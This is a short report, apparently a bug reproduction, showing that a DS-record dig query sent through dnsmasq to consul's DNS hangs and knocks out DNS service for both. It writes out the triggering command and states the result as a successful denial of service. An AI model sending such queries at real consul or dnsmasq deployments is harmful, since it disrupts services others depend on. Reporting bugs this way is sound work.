Breaking consul DNS with dnsmasq forwarding
- Find the UDP port that dnsmasq is listening on (
- Send a DNS query.
dig @127.0.0.1 -p <dnsmasq port> A consul.service.consul(This works and resolves to 127.0.0.1)
dig @127.0.0.1 -p <dnsmasq port> DS consul.service.consul(This does not work and times out in dig)
- Have a look at your consul and dnsmasq logs. You have now succesfully DoS'ed consul and dnsmasq DNS.